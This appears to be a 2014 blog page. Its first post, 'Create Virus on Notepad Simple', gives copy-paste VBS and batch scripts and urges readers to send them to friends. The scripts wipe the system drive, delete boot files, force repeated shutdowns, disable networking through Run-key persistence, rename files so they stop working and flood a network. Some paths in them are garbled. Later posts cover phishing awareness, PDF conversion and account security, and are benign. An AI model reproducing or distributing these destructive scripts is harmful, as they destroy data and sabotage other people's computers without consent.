Social Icons

twitterfacebookgoogle pluslinkedinrss feedemail

Featured Posts

Tuesday 20 May 2014

Create Virus on Notepad Simple


      Create Virus on Notepad Simple

    A computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. Viruses can also replicate themselves. All computer viruses are man-made. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.Since 1987, when a virus infected ARPANET, a large network used by the Defense Department and many universities, many antivirus programs have become available. These programs periodically check your computer system for the best-known types of viruses.Some people distinguish between general viruses and worms. A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs.

 

1 -> Virus Creation Tricks 1
Just open the Notepad and type the paste the following Code. set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having  .vbs Extension . 
2 -> Virus Creation Trick  2 . Open Notepad and write "start" without quotes
Start
Start
Start 
and then save it with .bat extension.  Now double click on this .bat file to run Command Prompt.
 3 -> Virus Creation Trick 3 
Convey your friend a little message and shut down his / her computer: @echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
 
Save it as "Anything.BAT" in All Files and send it. 
4 -> Virus Creation Trick 4  Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it. 




5 -> Virus Creation Trick 5  Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.
  



6 -> Virus Creation Trick 6  

This Virus Deletes All The Content Of A Drive...
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
 Save The Above Code As Anything.bat 





7 -> Virus Creation Trick 7
This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next


Save It As Anything.vbs 
 
 8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP



@Echo off
Del C: *.* |y


Save It As Anything.bat 

 9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


11 -> Virus Creation Trick 11
Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File
 
  
12 -> Virus Creation Trick 12 
Change Files To Non-working TXT Files
Save As A bat File


REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT



  

13 -> Virus Creation Trick 13 
System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File



Temporarily Flood Network
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !

Connect Me on Facebook :- 






 
My New Facebook Page Hacking :-






How to Protect Yourself from Phishing Scams

      

        How to Protect Yourself from    Phishing  And Scam


Phishing scams can happen when malicious organizations or people (also known as cybercriminals) present themselves as an entity you can trust, then try to trick you, or lure you, into providing them with your personal information. Phishing scams normally occur via email, websites, text messages, and sometimes, even phone calls. Cybercriminals will often pose as your bank or financial institution, your employer, or any other entity that you normally trust with your information. To protect yourself from phishing scams, you can learn about the methods these cybercriminals use and the signs that indicate you may be a potential victim.
 


  1. Protect Yourself from Phishing Scams Step 1.jpg
    1
    Determine if the nature of the correspondence is suspicious. The subject content of the email, phone call, or text message will often help you determine if the message is legitimate.
    • Phishing correspondences will usually ask you for sensitive, personal information that the organization should already have. For example, if your bank sends you an email asking you to provide them with your bank account and routing number, it may be a phishing scam.
    • In some cases, phishing correspondence may be written to induce panic or assume a threatening tone designed to make you act immediately and provide your personal information.
  2. Protect Yourself from Phishing Scams Step 2.jpg
    2
    Review suspicious emails and text messages for spelling and punctuation errors. In most cases, phishing scams are not proofread before they are sent and contain multiple errors.
    • If the email or text message is coming from a major business or corporation, it is unlikely that spelling and punctuation errors will be published without review by an editor.
  3. Protect Yourself from Phishing Scams Step 3.jpg
    3
    Call the organization directly to verify the inquiry. This will allow you to determine if the correspondence you received is legitimate or a phishing scam.
    • Mention to the organization that you received suspicious correspondence and you need to clarify its authenticity. The organization may also take further action on their end if it is a phishing scam.
    • If you were left with a voice mail or automated message providing you with a phone number to call, verify that the phone number matches with the phone number in your records for that organization.
  4. Protect Yourself from Phishing Scams Step 4.jpg
    4
    Examine the website links and logos in suspicious emails you receive. In some cases, links and logos are masked to look legitimate but may take you to a different website or cause you to download malicious files.
    • Hover your cursor over the link or business logo within your email. A small pop-up bar that displays the true website address will appear below the link embedded within the email.
    • Refrain from clicking or visiting any unfamiliar links that end with an "exe" extension. "Exe" links may cause you to download malicious software, spyware, or other programs that can steal your personal information.
  5. Protect Yourself from Phishing Scams Step 5.jpg
    5
    Examine the email address of the entity that sent you the email. Sometimes, phishing scams will display email addresses that resemble authentic company email addresses, but vary slightly enough to trick you. For example, if the email address for a business ends in "company.com," a phishing scam may use a variation such as "trusted.company.com" to trick you.
  6. Protect Yourself from Phishing Scams Step 6.jpg
    6
    Provide your personal information only to websites that are secure. This may prevent any personal information you enter from being seen or stolen by malicious entities.
    • Look at the address bar of the website you are visiting to determine if the site begins with "[[https" https"] [https" https"]] rather than "[http." http."] The "[[https" https"] [https" https"]] part of the web address indicates that the website is secure.
    • A yellow padlock icon displayed toward the bottom of your web session can also help you determine a website's security. Double-click on the padlock icon to verify that a security certificate displays on the screen, as some websites will display just a graphic of a padlock to be malicious.
  7. Protect Yourself from Phishing Scams Step 7.jpg
    7
    Review your bank statements regularly. This will allow you to see if any unauthorized charges or purchases have been made with your account, indicating that you may be the victim of a phishing scam.
    • If you notice any unauthorized activity in your bank account or on credit cards, notify your local authorities and your financial organizations immediately. This may prevent the cybercriminals behind the phishing scam from continuing to use your information.
Connect Me on Facebook:-






My New Facebook Page:-  

Friday 4 April 2014

How to Convert a PDF to a Word Document




How to Convert a PDF to a Word Document




                    PDFs are a convenient and easily accessible document. However, you may want to convert your PDF to a Word Document so you can edit it. Just remember that you won't be able to convert any images from the PDF to a Word Document -- you'll have to reinstate them afterwards. If you want to know how to convert your PDF to a Word Document in a variety of ways, just follow these easy steps.



Method 1 of 3: Use Adobe Acrobat


  1. 1
    Open Adobe Acrobat.
  2. Convert a PDF to a Word Document Step 2.jpg
    2
    Click "File."
  3. Convert a PDF to a Word Document Step 3.jpg
    3
    Click "Open."
  4. Convert a PDF to a Word Document Step 4.jpg
    4
    Select the file you'd like to convert and press "Open" again. Browse through your files until you find the PDF you'd like to convert to a Word Doc.
  5. 5
    Begin to convert the file in one of two ways. There are two quick and easy methods for converting the file:

    • Method one: Click on "File," and then "Save As." Click the drop-down menu next to "Format" and select "Microsoft Word Document." Then click "Save."
      Convert a PDF to a Word Document Step 5Bullet1.jpg
    • Method two: Click on "File" and then "Export." Select "Word Document." Once a new window pops up, name the document and hit "Save."
  6. Convert a PDF to a Word Document Step 6.jpg
    6
    Wait for the file to finish converting. This may take a few minutes, depending on the size of the PDF.
  7. Convert a PDF to a Word Document Step 7.jpg
    7
    Open the new Word file. Unless you changed the location, it should be saved in the same location where you saved the PDF. Double click it to open the file in Microsoft WoMethod 2 of 3: Use a Free Online Conversion Service
  1. Convert a PDF to a Word Document Step 8.jpg
    1
    Find a free PDF to Word converter online. You'll be able to use an online converter to convert your PDF to a Word file without downloading any programs on your computer. Find a reliable and free website, such as "PDF to Word."
  2. Convert a PDF to a Word Document Step 9.jpg
    2
    Select "Choose File." You can find this option on the left side of the screen.
  3. Convert a PDF to a Word Document Step 10.jpg
    3
    Select the file you'd like to convert. Search through your files to find the PDF that you'd like to convert to a Word Document.
    1. Convert a PDF to a Word Document Step 11.jpg
      4
      Type your email address if it's required. Many converter programs will ask for your email address so they can email the finished product to you; others will simply allow you access the finished product online.
    2. Convert a PDF to a Word Document Step 12.jpg
      5
      Confirm that you're "human" if it's required. Many programs will ask you type in the words that you see to prove that you're a real person.
    3. Convert a PDF to a Word Document Step 13.jpg
      6
      Click "Convert to Word."
    4. Convert a PDF to a Word Document Step 14.jpg
      7
      Wait for the file to download. This may take a few minutes.
    5. Convert a PDF to a Word Document Step 15.jpg
      8
      Open the file in your email. Once the file finished converting, you should be able to open it in your email.How to Convert a PDF to a Word DocumentEdi
    1. Convert a PDF to a Word Document Step 16.jpg
      1
      Download a free converter program on your computer. Look online to find a free and reliable program, such as "Free PDF to Word Converter." Make sure the program doesn't require you to give up personal or financial information.
    2. Convert a PDF to a Word Document Step 17.jpg
      2
      Install the program onto your computer. Once you've installed the program, you can begin to convert the PDF to a Word Document.
    3. Convert a PDF to a Word Document Step 18.jpg
      3
      Open the program.
    4. Convert a PDF to a Word Document Step 19.jpg
      4
      Click "Browse." This will allow you to look through your files to find the PDF file that you'd like to convert to a Word Doc. Browse through the files until you've found the one you want to use.
    5. Convert a PDF to a Word Document Step 20.jpg
      5
      Select and open the file.
    6. Convert a PDF to a Word Document Step 21.jpg
      6
      Select "General Options." Use this to change the options for the Word document. Click "All Pages" to convert every page in the PDF file into a Word Document. If you don't want to convert every page, just type the page numbers you'd like to convert.
    7. Convert a PDF to a Word Document Step 22.jpg
      7
      Click "Convert to Word Document." Wait for the PDF to covert.
    8. Convert a PDF to a Word Document Step 23.jpg
      8
      Save the new file. Once the PDF has converted to a Word Document, save it in this format.

Thursday 3 April 2014

How to Protect Your Web Accounts from Being Hacked


             Hacking is a regular occurrence worldwide over the internet. Email, social networking and other online accounts are at risk from being hacked into if care is not taken to keep secure information safe. To best to prevent your web accounts from being hacked, there are various approaches you can take to stay in control and secure.




Part 1 of 4: Email accounts




1.Use a secured email account.
 When signing up for an e-mail account or any other 

account on the internet, make use of all the verification processes it provides. These are usually additional layers of information that is known only to you. The verification processes provided include things such as Phone Verification, SMS Verification and answering specific security questions. Do your research on finding a secure email account, depending on your personal needs; there are reviews available from other users if you do online searches.
  • Be aware that the email service provider you're using will have its own security measures, hence no particular one is set out here. Simply follow the instructions that are aimed at securing your account as tightly as possible. If you are trying to use an email account that lacks security features, reconsider using it at all.
  • Be aware that no email service is 100 percent safe. Do everything possible to make hacking very difficult.
  1. 2
    Make your email address less easy to guess. If you include a number with your name or an unusual word, etc., it makes it harder for someone to simply guess your name by adding your first and last names together and emailing.
  2. 3
    Guard your email password. Do not give it to anybody else, do not store it in your email Drafts folder and do not store it where it can be accessed. Your password is valuable, so treat it as such and keep it confidential.
    • Tighten up the security of your account. Add an extra phone number and alternative email address for a password recovery if somehow your account is hacked and the password has been changed. Add security questions related to password recovery so you can recover your hacked password later on.


  1. 4
    React promptly but carefully to messages about possible attacks to your email account. If you receive a message from your email provider that they are concerned about the email being compromised, follow it up. Read it carefully though, as if the email itself is a scam, it will have giveaway signs such as bad grammar, illegitimate/spoofed logos, a click-on link to change a password (do not click, always change a password from the account itself), etc.
    • If you are suspicious that an email from your email provider isn't real, contact the email company directly, either by phone or by a separate email sent through their actual website. Wait to hear back from them before responding to the suspicious email. Some companies have email abuse or inquiry departments; check their website for more information.
  1. 5
    Consider using different email accounts for different purposes. If you want an account where you can be less careless, such as for leaving your email address all over the internet, etc., use a separate one intended just for that and leave nothing personal or sensitive on it, ever. Keep your personal email account secure using the suggestions above but also by not giving it to many people, other than those you trust.
  2. 6
    If it's too good to be true, it's suspicious. If you receive emails promising prizes, wins, money exchanges, eternal love, etc., then be very suspicious. Never click on a link promising such things and never reply to the email either. Delete the message without actioning it any further.
  3. Part 2 of 4: Social networking
  4. 1
    Have a secured Facebook account.       
              This is only provided for those who want to sign-up for Facebook. Use your original identity and information to sign-up for an Facebook account. Follow all of the account verification processes provided to make your account secure.
  5. 2
    Keep your password secure. Do not share it with anyone, do not store it in your mail inbox or anywhere on Facebook or online. Don't share your password with friends. If you log on at a cybercafé or similar, always remember to log right back off when you finish (better yet, don't use a public computer at all).
  6. 3
    Be really careful if using pubic access computers for Facebook, Twitter, etc. If possible, avoid checking your social networking accounts on anything but your own devices. But if you have no choice, consider the following:
    • Never click "keep me logged in", or similar long-term access checks, when entering the site.
    • Be aware of who is around you when you key in your password. Cover the keys if you feel safer.
    • Be discreet and don't attract attention while using the site. Curiosity can lead some people to want to fiddle just because...
    • Always remember to log out when you're done. Just get into the habit of going through a list in your head of "log in, do not check stay logged in, log out" when using public access devices.
  7. 4
    Be very careful with third party apps on Facebook, Twitter, etc. Before installing any (if you really must), do research into the reliability, safety and track record of the third party app. Ask friends, ask questions in forums, etc., to reassure yourself 
  8. 5
    Use the account's security settings to make things safer for you. For example, in Facebook, you can check the box that states "Browse Facebook on a secure connection (https) when possible". Enable login notifications––this will alert you should anyone other than yourself attempt to log in to your Facebook account. Enable login approvals too; this will require a special security code to be added should the account be opened from an unknown browser. You'll get a text message should such an attempt be made. And if you like, you can add trusted contacts who can help you get back on the site if you are hacked; simply check and fill the Trusted Contacts field.
    • Other social networking accounts have security settings too. Spend time checking these out and enabling what you feel protects you best.
    • of its 
    • 6
      Consider using the Privacy features to limit who can see you. In accounts such as Facebook, only allow friends to see your stuff; that way any "friends of friends" who might be less friendly in intent won't be able to see your account.
      • Whatever your social networking account, don't share your account with unknown people. In Facebook as well as Twitter, there is an option by which you can keep your account hidden from the general public, although your profile name will be shown. This option can be found in "Privacy settings " in Facebook and 'Settings ' in Twitter.
      • Only share video, photo and other content with friends.
      • In Facebook, change the timeline and tagging to be friends only.
      • Friend only those people you really know. If you don't know the person, assume it's safest not including them in your Facebook account.
      • safety. If you have any doubts, don't install it.


  9. Part 3 of 4: Sensible password precautions

    1. 1
      Use a very strong password. A hacker can access your account by using a attack called 'dictionary attack', in which all of the words from a standard dictionary of the English language is placed in the password box and after a while, the password may be revealed and a hack will occur. To reduce the possibility of a dictionary attack, add numbers, alphabets and even symbols (!@#$%^&) altogether. If the site allows for it, use a pass phrase with numbers and symbols too - this is even harder to crack, although it's not provided as an option as often as passwords.
      • An example: Suppose you have the password 'Hellotoyou' (without the quotes). This could be hacked within an hour or less using a dictionary attack. However, if you modify it to something like: '#ello2u' (without the quotes), it would take more than 1 month or even a year to crack and the hacker is going to give up and look for an easier target.
    2. 2
      Don't ever use obvious passwords. For example many people have the tendency of keeping the password as '<your own="" name="">', or 'password' or 'password123' , '<your girlfriend="" boyfriend="" name=""> '. People trying to access your account will use the obvious examples first.
      • There are password strength checkers available online for you to test a range of passwords before using them. This can help you work out what is as strong as possible each time.
    3. 3
      Keep changing your passwords. Don't be so confident about your strong password. It can also be hacked within a month, so if you have a persistent hacker who really wants to get your information, make it hard by constantly changing your password. This process must be processed at a minimum of every 3-4 months, more often if possible. It is a good way to keep your memory in shape too!
    4. 4
      Don't use the same password in every web based account you have. Doing this could be the greatest pitfall ever, for if a hacker comes to know your Facebook password, the obvious next step is to input this password into other accounts in the hope you've been lazy and used the same one over and over. If you have, then bingo! Your whole web life could be wiped out.
    5. Part 4 of 4: General safety
    1. 1
      Keep your account information details safe. Keep a record of account information such as email ID, phone numbers you've provided, alternative email addresses given and security questions with answers. Keep this information in a safe and secure place, such as on a piece of paper stored in your home. Some sites, such as Facebook and Twitter, allow you to download such information to your computer, so you might like to do this every 3 to 4 months.
      • Password lists: This is a touchy subject. Most advice is to keep passwords in your head. The reality is that many people cannot do this effectively, especially if you need different passwords for dozens or even hundreds of sites. Find a sensible way to keep copies of such passwords safely, such as paper written lists (for example, divide into different lists, keep in different places), not writing down passwords for your most used accounts (those ones ought to be easily remembered) or only writing down passwords for accounts that have no sensitive information when entered, etc. You'll need to devise a safe way that works for you, bearing in mind that many sites offer password retrieval to cover forgetfulness.
      • Be aware that if you keep lists of passwords etc. on your computer, and your computer is hacked, all of the listed accounts may be compromised.
      • Use a good code to keep any stored personal reminder information safe from being read. You can make it up or learn one; the idea is that unless you're harboring an important state secret, most hackers won't persist with anything that is simply too much effort.
    2. 2
      Reduce the chances that you'll end up spamming others. Spam can occur when your email or social networking account is hacked and your list of contacts is used to send on spam from your address/account. Ways to avoid this happening include having a strong password so your account cannot be hacked, not adding friends in Facebook whom you don't know, not clicking on links in emails from people you don't know, etc.
      • Never reply to emails that land in your spam folder. Delete them immediately. By replying, even in a gesture of humor, you confirm your existence and you'll just keep getting more spam from the sender.

  10. Thank You For Reading :-
  11. Click Here:-
  12. My New Facebook Page :-
  13.  












 
 
Blogger Templates